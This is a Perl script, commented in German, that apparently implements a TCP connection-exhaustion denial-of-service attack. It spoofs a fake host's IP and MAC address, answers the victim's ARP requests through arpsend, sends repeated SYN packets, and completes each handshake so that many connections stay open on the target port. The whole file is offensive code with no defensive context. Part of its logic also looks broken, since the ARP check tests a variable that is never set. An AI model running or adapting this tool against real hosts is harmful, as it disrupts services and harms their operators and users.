#! /usr/bin/perl
###########################################################
# Tool, zum Öffnen von TCP-Ports in großer Anzahl
# Autor: Ernst Pisch
# 
# Nötige Voraussetzungen:
#  Libpcap (ftp://ftp.ee.lbl.gov/libpcap.tar.Z - meist
#           in Linux schon enthalten)
#  Perl-Modul Net::RawIP (http://quake.skif.net/RawIP/ oder
#           http://www.ic.al.lg.ua/~ksv/)
#  Libnet Library (http://www.packetfactory.net/libnet/)
#  arpsend (http://wwwnet.princeton.edu/software/arpsend/)
###########################################################

use Net::RawIP;
require 'getopts.pl';

Getopts('i:t:m:f:p:n:');
die "Usage $0 -i device -t Target-IP -m Target-MAC -f Fake-IP -p TCP-Port -n count\
\t-i device\t\tEthernet-Interface (default: eth0)\
\t-t Target-IP\t\tIP-Address of Target-Host\
\t-m Target-MAC\t\tMAC-Address of Target-Host\
\t-f Fake-IP\t\tIP of a non-existent Host\n
\t-p TCP-Port\t\tPort on the Target-Host\
\t-n count\t\tNumber of times to send\n"
    unless ($opt_t && $opt_m && $opt_f && $opt_p);

# set default values
$opt_i = eth0 unless $opt_i;
$opt_n = 1    unless $opt_n;

$arp_req = "\x00\x01";        # Code für ARP-Request im ARP-Paket
$fport   = sprintf("%d",int rand 16); #TCP-Port des fiktiven Hosts
$fmac    = &GenMAC;           # MAC-Adresse des fiktiven Hosts

# Filter, welches nach ARP-Requests des Opfers sucht
$filta = "arp and src host $opt_t and dst host $opt_f";
# Filter, welches Antwort-Pakete des Opfers sucht
$filtb = "src host $opt_t and dst host $opt_f";
$size  = 1500;
$tout  = 30;

$SIG{INT} = sub { die "Process PID:$$ dying\n"};

if (fork) {
  $a = new Net::RawIP;
  my $pcap = $a->pcapinit($opt_i,$filta,$size,$tout);
  # Warten auf ARP-Request des Opfers
  loop $pcap,1,\&arpreply,\@a;
}
elsif (fork) {
  $b = new Net::RawIP;
  my $pcap = $b->pcapinit($opt_i,$filtb,$size,$tout);
  $d = new Net::RawIP;
  # Warten auf SYN/ACK des Opfers
  loop $pcap,-1,\&ackreply,\@b;
}
else {
  $sequence = sprintf("%d",int rand 16);
  $c = new Net::RawIP;
  for ($i=0;$i <= $opt_n; $i++){
#    sleep 1;
    $c->ethnew($opt_i, dest => $opt_m, source => $fmac);
    $c->set ({ ip =>  {saddr  => $opt_f,
		       daddr  => $opt_t
		      },
	       tcp => {dest   => $opt_p,
		       source => $fport++,
		       seq    => $sequence++,
		       syn    => 1
		      }
	     });
    $c->ethsend;
  }
}

sub GenMAC
  {
    my $tmp_mac="00";
    my $i=0;
    # generate random mac-address
    while($i++ < 5) {
      $tmp_mac.=":" . sprintf("%x",int rand 16);
      $tmp_mac.=sprintf("%x",int rand 16);
    }
    return($tmp_mac);
  }

sub arpreply {
  if ( $arp_op eq $arp_req ) {
    system "arpsend -w -o 2 -i $opt_i -S $fmac -s $opt_f -E $fmac -e $opt_m -T $opt_m -t $opt_t";
  }
}

sub ackreply {
  $b->bset(substr( $_[2],14));
  my @pak = $b->get({ tcp=>[qw(source dest seq ack_seq ack syn)]});
  if ( $pak[4] & $pak[5] ) {
      $d->ethnew($opt_i, dest => $opt_m, source => $fmac);
      $d->set({ ip =>  {saddr  => $opt_f,
			daddr  => $opt_t
			},
			    tcp => {dest   => $pak[0],
				    source => $pak[1],
				    seq    => $pak[3]+1,
				    ack_seq => $pak[2]+1,
				    ack    => 1
				    }
	    });
      $d->ethsend;
  }
}